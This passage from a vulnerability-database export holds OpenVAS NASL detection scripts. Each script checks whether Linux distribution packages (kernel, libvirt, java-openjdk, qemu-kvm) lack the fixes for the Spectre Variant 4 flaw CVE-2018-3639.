security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-05-22T00:00:00", "id": "OPENVAS:1361412562310843533", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843533", "title": "Ubuntu Update for linux USN-3652-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3652_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3652-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843533\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 12:43:02 +0200 (Tue, 22 May 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3652-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn and Ken Johnson discovered that\nmicroprocessors utilizing speculative execution of a memory read may allow\nunauthorized memory reads via a sidechannel attack. This flaw is known as Spectre\nVariant 4. A local attacker could use this to expose sensitive information,\nincluding kernel memory.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 18.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3652-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3652-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1008-gcp\", ver:\"4.15.0-1008.8\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1009-aws\", ver:\"4.15.0-1009.9\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1010-kvm\", ver:\"4.15.0-1010.10\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-22-generic\", ver:\"4.15.0-22.24\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-22-generic-lpae\", ver:\"4.15.0-22.24\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-22-lowlatency\", ver:\"4.15.0-22.24\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1009.9\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.15.0.1012.12\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure-edge\", ver:\"4.15.0.1012.12\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1008.10\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.22.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.22.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1008.10\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1010.10\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.22.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.1006.8\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-22T00:00:00", "id": "OPENVAS:1361412562310874720", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874720", "title": "Fedora Update for libvirt FEDORA-2018-527698a904", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_527698a904_libvirt_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libvirt FEDORA-2018-527698a904\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874720\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-22 06:02:25 +0200 (Fri, 22 Jun 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libvirt FEDORA-2018-527698a904\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvirt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libvirt on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-527698a904\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NJ6FHD2X5JQC5GT42HY5H4MLDEPQHPAX\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~4.1.0~3.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:25", "bulletinFamily": "scanner", "description": "Check the version of java", "modified": "2019-03-08T00:00:00", "published": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310882881", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882881", "title": "CentOS Update for java CESA-2018:1650 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1650_java_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for java CESA-2018:1650 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882881\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-23 05:40:24 +0200 (Wed, 23 May 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2018:1650 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime\nEnvironment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This is the OpenJDK side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1650\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022833.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk\", rpm:\"java-1.8.0-openjdk~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-debug\", rpm:\"java-1.8.0-openjdk-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-demo\", rpm:\"java-1.8.0-openjdk-demo~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-demo-debug\", rpm:\"java-1.8.0-openjdk-demo-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-devel\", rpm:\"java-1.8.0-openjdk-devel~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-devel-debug\", rpm:\"java-1.8.0-openjdk-devel-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-headless\", rpm:\"java-1.8.0-openjdk-headless~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-headless-debug\", rpm:\"java-1.8.0-openjdk-headless-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-javadoc\", rpm:\"java-1.8.0-openjdk-javadoc~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-javadoc-debug\", rpm:\"java-1.8.0-openjdk-javadoc-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-src\", rpm:\"java-1.8.0-openjdk-src~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.8.0-openjdk-src-debug\", rpm:\"java-1.8.0-openjdk-src-debug~1.8.0.171~8.b10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:27", "bulletinFamily": "scanner", "description": "Check the version of qemu-guest-agent", "modified": "2019-03-08T00:00:00", "published": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310882880", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882880", "title": "CentOS Update for qemu-guest-agent CESA-2018:1660 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1660_qemu-guest-agent_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for qemu-guest-agent CESA-2018:1660 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882880\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-23 05:40:20 +0200 (Wed, 23 May 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for qemu-guest-agent CESA-2018:1660 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of qemu-guest-agent\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Kernel-based Virtual Machine (KVM) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm packages provide the\nuser-space component for running virtual machines that use KVM.\n\nSecurity Fix(es):\n\n * An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\");\n script_tag(name:\"affected\", value:\"qemu-guest-agent on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1660\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022837.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"qemu-guest-agent\", rpm:\"qemu-guest-agent~0.12.1.2~2.503.el6_9.6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-img\", rpm:\"qemu-img~0.12.1.2~2.503.el6_9.6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-kvm\", rpm:\"qemu-kvm~0.12.1.2~2.503.el6_9.6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-kvm-tools\", rpm:\"qemu-kvm-tools~0.12.1.2~2.503.el6_9.6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-01-27T18:38:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181200", "title": "Huawei EulerOS: Security Advisory for qemu-kvm (EulerOS-SA-2018-1200)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1200\");\n script_version(\"2020-01-23T11:17:10+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:17:10 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:10 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for qemu-kvm (EulerOS-SA-2018-1200)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1200\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1200\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'qemu-kvm' package(s) announced via the EulerOS-SA-2018-1200 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\");\n\n script_tag(name:\"affected\", value:\"'qemu-kvm' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"qemu-img\", rpm:\"qemu-img~1.5.3~156.3.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qemu-kvm\", rpm:\"qemu-kvm~1.5.3~156.3.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qemu-kvm-common\", rpm:\"qemu-kvm-common~1.5.3~156.3.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-01-27T18:39:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181153", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1153)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1153\");\n script_version(\"2020-01-23T11:15:25+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:15:25 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:15:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1153)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1153\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1153\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1153 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.(CVE-2018-3639)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n 